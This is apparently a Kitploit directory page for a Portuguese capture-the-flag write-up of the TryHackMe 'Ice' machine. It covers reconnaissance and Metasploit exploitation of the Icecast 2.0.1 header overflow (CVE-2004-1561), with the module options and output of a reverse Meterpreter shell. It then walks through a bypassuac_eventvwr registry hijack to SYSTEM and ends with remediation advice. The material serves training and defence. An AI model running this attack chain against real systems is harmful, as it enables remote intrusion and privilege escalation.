Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
thm-ice-icecast-rce-privesc — Comprometimento total da máquina Ice do TryHackMe — RCE no Icecast 2.0.1 (CVE-2004-1561) via estouro de buffer, seguido de escalonamento de privilégios no Windows por meio de bypass de UAC / sequestro de COM. Inclui metodologia detalhada e remediação. | Kitploit
Ferramentas/GitHubGitHub/monseigneurpatas/thm-ice-icecast-rce-privesc
Escalada de PrivilégiosReconhecimentoAnálise de VulnerabilidadesExploraçãoCTFTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
monseigneurpatas/thm-ice-icecast-rce-privesc

thm-ice-icecast-rce-privesc

Comprometimento total da máquina Ice do TryHackMe — RCE no Icecast 2.0.1 (CVE-2004-1561) via estouro de buffer, seguido de escalonamento de privilégios no Windows por meio de bypass de UAC / sequestro de COM. Inclui metodologia detalhada e remediação.

Ver Repositório
2há 2 mesesAinda não revisado

TryHackMe — Ice: Icecast 2.0.1 RCE & Escalação de Privilégios no Windows

Plataforma: TryHackMe SO alvo: Windows 7 / Windows Server 2008 R2 Dificuldade: Fácil Categoria: Buffer Overflow (RCE), Escalação Local de Privilégios


Resumo

Este relatório documenta a exploração completa da máquina Ice no TryHackMe, desde a reconhecimento inicial até a escalação de privilégios para SYSTEM. O alvo expõe um servidor de streaming de mídia Icecast 2.0.1 desatualizado, vulnerável a um buffer overflow remoto (CVE-2004-1561) que permite a execução arbitrária de código por meio de cabeçalhos HTTP maliciosos. O acesso inicial foi obtido como um usuário de baixo privilégio por meio de um reverse shell Meterpreter. A escalação de privilégios para NT AUTHORITY\SYSTEM foi então alcançada abusando de uma vulnerabilidade de sequestro de objeto COM do Windows (bypassuac_eventvwr), que aproveita binários com autoelevação e redirecionamento de chaves de registro em HKCU.

EtapaTécnicaResultado
Reconhecimentoarp-scan, nmapHost identificado + 7 portas abertas
Acesso InicialBuffer overflow no cabeçalho HTTP do Icecast (CVE-2004-1561)Sessão Meterpreter como usuário local
Escalação de Privilégiosbypassuac_eventvwr (sequestro de COM/registro)Shell SYSTEM

1. Reconhecimento

1.1 Descoberta de Host

Uma varredura ARP foi usada para identificar o endereço IP do alvo na rede local.

root@kitploit:~
arp-scan -l

Resultados da varredura ARP e Nmap

Alvo identificado em 192.168.37.138.

1.2 Enumeração de Portas e Serviços

Uma varredura SYN completa com detecção de serviço/versão foi executada contra o alvo:

root@kitploit:~
nmap -sS -sV 192.168.37.138

Resultados:

O host foi identificado como DARK-PC, uma máquina Windows. A porta 8000 executando Icecast destacou-se como a superfície de ataque mais promissora — não é um serviço Windows padrão e é conhecida por possuir CVEs históricas.


2. Identificação de Vulnerabilidade

Uma busca por vulnerabilidades conhecidas do Icecast revelou a CVE-2004-1561:

Buffer overflow no Icecast 2.0.1 e versões anteriores permite que atacantes remotos executem código arbitrário por meio de uma solicitação HTTP com um grande número de cabeçalhos.

Um módulo correspondente do Metasploit foi confirmado:

root@kitploit:~
search CVE-2004-1561

Busca de CVE no Metasploit

root@kitploit:~
exploit/windows/http/icecast_header   2004-09-28   great   No   Icecast Header Overwrite

3. Exploração — Acesso Inicial

3.1 Causa Raiz

O Icecast 2.0.1 não verifica adequadamente os limites do número de cabeçalhos HTTP que processa. Ao enviar mais cabeçalhos do que o buffer do servidor é dimensionado para suportar, o excesso de dados transborda para a memória adjacente, sobrescrevendo dados fora do buffer reservado para análise de cabeçalhos.

Especificamente, o overflow corrompe o endereço de retorno salvo (EIP) na pilha — o endereço para o qual a CPU retorna quando a função que trata a solicitação termina. Ao controlar esse endereço, um atacante pode redirecionar a execução para um shellcode fornecido pelo atacante, em vez do ponto de retorno legítimo, resultando em execução arbitrária de código no contexto do processo Icecast.

3.2 Configuração do Módulo

root@kitploit:~
use exploit/windows/http/icecast_header
set RHOSTS 192.168.37.138
set RPORT 8000
set LHOST 192.168.37.133
set LPORT 4444

Opções do exploit e execução bem-sucedida

3.3 Execução

root@kitploit:~
exploit
root@kitploit:~
[*] Started reverse TCP handler on 192.168.37.133:4444
[*] Sending stage (177734 bytes) to 192.168.37.138
[*] Meterpreter session 1 opened (192.168.37.133:4444 -> 192.168.37.138:49181)

Uma sessão Meterpreter foi estabelecida como um usuário de baixo privilégio.


4. Escalação de Privilégios

4.1 Sugestor de Exploits Local

Com uma sessão ativa, o sugestor integrado do Metasploit foi usado para identificar caminhos viáveis de escalação local de privilégios para o nível de correção do alvo:

root@kitploit:~
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Resultados do sugestor de exploits local

Vários módulos foram sinalizados como provavelmente viáveis, incluindo bypassuac_eventvwr, que visa hosts Windows 7 / Server 2008 R2 sem correções.

4.2 Causa Raiz — Bypass de UAC via Sequestro de COM

Esse caminho de escalação de privilégios abusa da arquitetura COM (Component Object Model) do Windows, que permite que componentes escritos em diferentes linguagens interoperem. Objetos COM normalmente dependem de DLLs compartilhadas, e o sistema resolve qual DLL carregar para um determinado objeto COM por meio de caminhos de registro — incluindo caminhos armazenados no hive HKCU do usuário atual.

eventvwr.exe é um binário Windows com autoelevação (ele silenciosamente dispara uma solicitação de elevação de UAC sem exibir o prompt em si, devido às configurações de manifesto, em configurações padrão de UAC). Quando executado, ele consulta HKCU para resolver um objeto COM e carregar sua DLL associada.

O exploit sequestra essa consulta: ele grava uma chave de registro maliciosa no hive HKCU do usuário atual, apontando a resolução do COM para um payload controlado pelo atacante, em vez da DLL legítima do sistema. Como o eventvwr.exe se autoeleva, o payload que ele aciona — neste caso, um shell de comando — é executado com o nível de integridade ao qual o eventvwr.exe eleva, elevando a sessão de um usuário padrão para um contexto de privilégios mais altos, sem nunca exibir um prompt de UAC visível.

4.3 Execução

root@kitploit:~
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST 192.168.37.133
set LPORT 4444
exploit

Sucesso do exploit de escalação de privilégios

root@kitploit:~
[*] UAC is enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[*] Meterpreter session 2 opened (192.168.37.133:4444 -> 192.168.37.138:49180)
[*] Cleaning up registry keys ...

C:\Windows\system32>

Uma segunda sessão Meterpreter foi aberta com um shell elevado, caindo diretamente em C:\Windows\system32, confirmando a escalação de privilégios.


5. Resumo das Descobertas

#DescobertaSeveridade

6. Remediação

  1. Corrija ou substitua o Icecast. A versão 2.0.1 está mais de duas décadas desatualizada; atualize para a versão mantida mais recente ou desative o serviço se não for utilizado.
  2. Restrinja a exposição de serviços de streaming/mídia apenas a redes internas — eles não devem ser alcançáveis pela internet ou por toda a LAN sem uma necessidade clara de negócio.
  3. Aplique as atualizações atuais do Windows. O abuso da autoelevação do eventvwr.exe foi corrigido em versões posteriores do Windows; esse ataque não funciona contra versões modernas e totalmente atualizadas do Windows.
  4. Endureça as configurações de UAC para "Sempre notificar" em vez do nível padrão, o que elimina vários caminhos de abuso de autoelevação silenciosa.
  5. Princípio do menor privilégio: a conta comprometida não deveria fazer parte do grupo local Administrators, que é o que permitiu que a técnica de bypass de UAC tivesse sucesso em primeiro lugar.

Ferramentas Utilizadas

  • arp-scan, nmap — reconhecimento
  • Metasploit Framework (msfconsole) — exploração e pós-exploração
  • Meterpreter — shell de pós-exploração

Habilidades Demonstradas

  • Reconhecimento de rede e enumeração de serviços
  • Pesquisa de CVEs e mapeamento exploit-vulnerabilidade
  • Conceitos de corrupção de memória / exploração de buffer overflow (sobrescrita de EIP)
  • Internals do Windows: resolução de objetos COM, sequestro de registro, mecânicas de bypass de UAC
  • Documentação completa da cadeia de ataque (reconhecimento → exploração → escalação de privilégios → remediação)
Baixar ferramenta
PortaServiçoVersão
135/tcpmsrpcMicrosoft Windows RPC
139/tcpnetbios-ssnMicrosoft Windows netbios-ssn
445/tcpmicrosoft-dsWindows 7–10 (grupo de trabalho: WORKGROUP)
5357/tcphttpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcphttpIcecast streaming media server
49152–49157/tcpmsrpcMicrosoft Windows RPC
CVE / Referência
1Buffer overflow no cabeçalho HTTP do Icecast 2.0.1 levando à execução remota de códigoCríticaCVE-2004-1561
2Bypass de UAC via sequestro de COM/registro (autoelevação do eventvwr.exe)AltaFraqueza conhecida de design do UAC no Windows 7/Server 2008 R2